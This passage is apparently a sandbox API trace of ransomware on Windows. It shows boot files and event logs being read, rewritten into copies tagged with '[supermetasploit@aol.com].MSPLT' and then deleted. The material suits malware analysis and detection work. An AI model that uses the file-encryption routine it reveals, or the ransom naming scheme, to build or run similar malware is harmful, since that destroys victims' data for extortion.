(lpString1=".7z", lpString2="mui") returned -1 [0286.296] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.296] lstrlenW (lpString=".dbf") returned 4 [0286.296] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.296] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.296] lstrlenW (lpString=".1cd") returned 4 [0286.296] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.296] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.296] lstrlenW (lpString=".jpg") returned 4 [0286.296] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.296] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.296] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.296] lstrlenW (lpString=".doc") returned 4 [0286.296] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.296] lstrlenW (lpString=".docx") returned 5 [0286.296] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.296] lstrlenW (lpString=".pdf") returned 4 [0286.296] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.296] lstrlenW (lpString=".xls") returned 4 [0286.296] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.296] lstrlenW (lpString=".xlsx") returned 5 [0286.296] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.296] lstrlenW (lpString=".ppt") returned 4 [0286.296] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.297] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.297] lstrlenW (lpString=".zip") returned 4 [0286.297] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.297] lstrlenW (lpString=".rar") returned 4 [0286.297] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.297] lstrlenW (lpString=".bz2") returned 4 [0286.297] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.297] lstrlenW (lpString=".7z") returned 3 [0286.297] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.297] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.297] lstrlenW (lpString=".dbf") returned 4 [0286.297] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.297] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.297] lstrlenW (lpString=".1cd") returned 4 [0286.297] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.297] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0286.297] lstrlenW (lpString=".jpg") returned 4 [0286.297] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.297] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.297] lstrlenW (lpString="memtest.exe.mui") returned 15 [0286.297] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.297] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=42904) returned 1 [0286.297] CloseHandle (hObject=0x3e4) returned 1 [0286.298] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui")) returned 0x20 [0286.298] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.298] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.298] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.298] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.298] lstrlenW (lpString=".doc") returned 4 [0286.298] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.298] lstrlenW (lpString=".docx") returned 5 [0286.298] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.298] lstrlenW (lpString=".pdf") returned 4 [0286.298] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.298] lstrlenW (lpString=".xls") returned 4 [0286.298] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.298] lstrlenW (lpString=".xlsx") returned 5 [0286.298] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.298] lstrlenW (lpString=".ppt") returned 4 [0286.298] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.298] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.298] lstrlenW (lpString=".zip") returned 4 [0286.298] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.298] lstrlenW (lpString=".rar") returned 4 [0286.298] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.298] lstrlenW (lpString=".bz2") returned 4 [0286.298] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.298] lstrlenW (lpString=".7z") returned 3 [0286.298] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.298] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.298] lstrlenW (lpString=".dbf") returned 4 [0286.299] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.299] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.299] lstrlenW (lpString=".1cd") returned 4 [0286.299] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.299] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.299] lstrlenW (lpString=".jpg") returned 4 [0286.299] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.299] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.299] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.299] lstrlenW (lpString=".doc") returned 4 [0286.299] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.299] lstrlenW (lpString=".docx") returned 5 [0286.299] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.299] lstrlenW (lpString=".pdf") returned 4 [0286.299] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.299] lstrlenW (lpString=".xls") returned 4 [0286.299] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.299] lstrlenW (lpString=".xlsx") returned 5 [0286.299] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.299] lstrlenW (lpString=".ppt") returned 4 [0286.299] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.299] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.299] lstrlenW (lpString=".zip") returned 4 [0286.299] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.299] lstrlenW (lpString=".rar") returned 4 [0286.299] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.299] lstrlenW (lpString=".bz2") returned 4 [0286.299] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.299] lstrlenW (lpString=".7z") returned 3 [0286.299] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.299] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.299] lstrlenW (lpString=".dbf") returned 4 [0286.299] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.299] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.299] lstrlenW (lpString=".1cd") returned 4 [0286.300] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.300] lstrlenW (lpString="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 29 [0286.300] lstrlenW (lpString=".jpg") returned 4 [0286.300] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.300] Sleep (dwMilliseconds=0x64) [0286.535] lstrlenW (lpString="BOOTNXT") returned 7 [0286.536] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0287.445] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=1) returned 1 [0287.445] CloseHandle (hObject=0x3f4) returned 1 [0287.445] GetFileAttributesW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt")) returned 0x26 [0287.446] GetFileAttributesW (lpFileName="C:\\BOOTNXT.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\bootnxt.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.446] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0287.446] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.446] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.446] CreateFileW (lpFileName="C:\\BOOTNXT.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\bootnxt.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0287.447] GetLastError () returned 0x0 [0287.447] ReadFile (in: hFile=0x3f4, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x1, lpOverlapped=0x0) returned 1 [0287.465] WriteFile (in: hFile=0x430, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x10, lpOverlapped=0x0) returned 1 [0287.466] ReadFile (in: hFile=0x3f4, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0287.466] WriteFile (in: hFile=0x430, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xe2, lpOverlapped=0x0) returned 1 [0287.466] SetEndOfFile (hFile=0x430) returned 1 [0287.467] CloseHandle (hObject=0x430) returned 1 [0287.468] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.468] SetEndOfFile (hFile=0x3f4) returned 1 [0287.473] CloseHandle (hObject=0x3f4) returned 1 [0287.473] SetFileAttributesW (lpFileName="C:\\BOOTNXT.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x26) returned 1 [0287.474] DeleteFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt")) returned 1 [0287.474] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.474] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.474] lstrlenW (lpString=".doc") returned 4 [0287.474] lstrcmpiW (lpString1=".doc", lpString2="TNXT") returned -1 [0287.475] lstrlenW (lpString=".docx") returned 5 [0287.475] lstrcmpiW (lpString1=".docx", lpString2="OTNXT") returned -1 [0287.475] lstrlenW (lpString=".pdf") returned 4 [0287.475] lstrcmpiW (lpString1=".pdf", lpString2="TNXT") returned -1 [0287.475] lstrlenW (lpString=".xls") returned 4 [0287.475] lstrcmpiW (lpString1=".xls", lpString2="TNXT") returned -1 [0287.475] lstrlenW (lpString=".xlsx") returned 5 [0287.475] lstrcmpiW (lpString1=".xlsx", lpString2="OTNXT") returned -1 [0287.475] lstrlenW (lpString=".ppt") returned 4 [0287.475] lstrcmpiW (lpString1=".ppt", lpString2="TNXT") returned -1 [0287.475] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.475] lstrlenW (lpString=".zip") returned 4 [0287.475] lstrcmpiW (lpString1=".zip", lpString2="TNXT") returned -1 [0287.475] lstrlenW (lpString=".rar") returned 4 [0287.475] lstrcmpiW (lpString1=".rar", lpString2="TNXT") returned -1 [0287.475] lstrlenW (lpString=".bz2") returned 4 [0287.475] lstrcmpiW (lpString1=".bz2", lpString2="TNXT") returned -1 [0287.475] lstrlenW (lpString=".7z") returned 3 [0287.475] lstrcmpiW (lpString1=".7z", lpString2="NXT") returned -1 [0287.475] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.475] lstrlenW (lpString=".dbf") returned 4 [0287.475] lstrcmpiW (lpString1=".dbf", lpString2="TNXT") returned -1 [0287.475] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.475] lstrlenW (lpString=".1cd") returned 4 [0287.476] lstrcmpiW (lpString1=".1cd", lpString2="TNXT") returned -1 [0287.476] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.476] lstrlenW (lpString=".jpg") returned 4 [0287.476] lstrcmpiW (lpString1=".jpg", lpString2="TNXT") returned -1 [0287.476] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.476] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.476] lstrlenW (lpString=".doc") returned 4 [0287.476] lstrcmpiW (lpString1=".doc", lpString2="TNXT") returned -1 [0287.476] lstrlenW (lpString=".docx") returned 5 [0287.476] lstrcmpiW (lpString1=".docx", lpString2="OTNXT") returned -1 [0287.476] lstrlenW (lpString=".pdf") returned 4 [0287.476] lstrcmpiW (lpString1=".pdf", lpString2="TNXT") returned -1 [0287.476] lstrlenW (lpString=".xls") returned 4 [0287.476] lstrcmpiW (lpString1=".xls", lpString2="TNXT") returned -1 [0287.476] lstrlenW (lpString=".xlsx") returned 5 [0287.476] lstrcmpiW (lpString1=".xlsx", lpString2="OTNXT") returned -1 [0287.476] lstrlenW (lpString=".ppt") returned 4 [0287.476] lstrcmpiW (lpString1=".ppt", lpString2="TNXT") returned -1 [0287.476] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.476] lstrlenW (lpString=".zip") returned 4 [0287.476] lstrcmpiW (lpString1=".zip", lpString2="TNXT") returned -1 [0287.476] lstrlenW (lpString=".rar") returned 4 [0287.477] lstrcmpiW (lpString1=".rar", lpString2="TNXT") returned -1 [0287.477] lstrlenW (lpString=".bz2") returned 4 [0287.477] lstrcmpiW (lpString1=".bz2", lpString2="TNXT") returned -1 [0287.477] lstrlenW (lpString=".7z") returned 3 [0287.477] lstrcmpiW (lpString1=".7z", lpString2="NXT") returned -1 [0287.477] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.477] lstrlenW (lpString=".dbf") returned 4 [0287.477] lstrcmpiW (lpString1=".dbf", lpString2="TNXT") returned -1 [0287.477] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.477] lstrlenW (lpString=".1cd") returned 4 [0287.477] lstrcmpiW (lpString1=".1cd", lpString2="TNXT") returned -1 [0287.477] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0287.477] lstrlenW (lpString=".jpg") returned 4 [0287.477] lstrcmpiW (lpString1=".jpg", lpString2="TNXT") returned -1 [0287.477] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0287.477] lstrlenW (lpString="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 71 [0287.477] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0287.572] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=1052672) returned 1 [0287.572] CloseHandle (hObject=0x43c) returned 1 [0287.572] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx")) returned 0x20 [0287.572] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.572] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0287.572] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.572] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.572] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0287.573] GetLastError () returned 0x0 [0287.573] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0287.805] WriteFile (in: hFile=0x448, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0288.084] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x1010, lpOverlapped=0x0) returned 1 [0288.096] WriteFile (in: hFile=0x448, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x1020, lpOverlapped=0x0) returned 1 [0288.101] ReadFile (in: hFile=0x43c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0288.102] WriteFile (in: hFile=0x448, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x162, lpOverlapped=0x0) returned 1 [0288.102] SetEndOfFile (hFile=0x448) returned 1 [0288.225] CloseHandle (hObject=0x448) returned 1 [0288.307] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.308] SetEndOfFile (hFile=0x43c) returned 1 [0288.336] CloseHandle (hObject=0x43c) returned 1 [0288.336] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.336] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx")) returned 1 [0288.336] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.336] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.337] lstrlenW (lpString=".doc") returned 4 [0288.337] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.337] lstrlenW (lpString=".docx") returned 5 [0288.337] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.337] lstrlenW (lpString=".pdf") returned 4 [0288.337] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.337] lstrlenW (lpString=".xls") returned 4 [0288.337] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.337] lstrlenW (lpString=".xlsx") returned 5 [0288.337] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.337] lstrlenW (lpString=".ppt") returned 4 [0288.337] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.337] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.337] lstrlenW (lpString=".zip") returned 4 [0288.337] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.337] lstrlenW (lpString=".rar") returned 4 [0288.337] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.337] lstrlenW (lpString=".bz2") returned 4 [0288.337] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.338] lstrlenW (lpString=".7z") returned 3 [0288.338] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.338] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.338] lstrlenW (lpString=".dbf") returned 4 [0288.338] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.338] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.338] lstrlenW (lpString=".1cd") returned 4 [0288.338] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.338] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.338] lstrlenW (lpString=".jpg") returned 4 [0288.338] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.338] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.338] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.338] lstrlenW (lpString=".doc") returned 4 [0288.338] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.338] lstrlenW (lpString=".docx") returned 5 [0288.338] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.338] lstrlenW (lpString=".pdf") returned 4 [0288.338] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.338] lstrlenW (lpString=".xls") returned 4 [0288.338] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.338] lstrlenW (lpString=".xlsx") returned 5 [0288.338] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.338] lstrlenW (lpString=".ppt") returned 4 [0288.338] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.338] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.338] lstrlenW (lpString=".zip") returned 4 [0288.339] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.339] lstrlenW (lpString=".rar") returned 4 [0288.339] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.339] lstrlenW (lpString=".bz2") returned 4 [0288.339] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.339] lstrlenW (lpString=".7z") returned 3 [0288.339] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.339] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.339] lstrlenW (lpString=".dbf") returned 4 [0288.339] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.339] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.339] lstrlenW (lpString=".1cd") returned 4 [0288.339] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.339] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0288.339] lstrlenW (lpString=".jpg") returned 4 [0288.339] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.339] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.339] lstrlenW (lpString="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 55 [0288.339] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0288.341] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0288.341] CloseHandle (hObject=0x43c) returned 1 [0288.341] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx")) returned 0x20 [0288.341] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.341] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0288.341] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.342] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.342] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 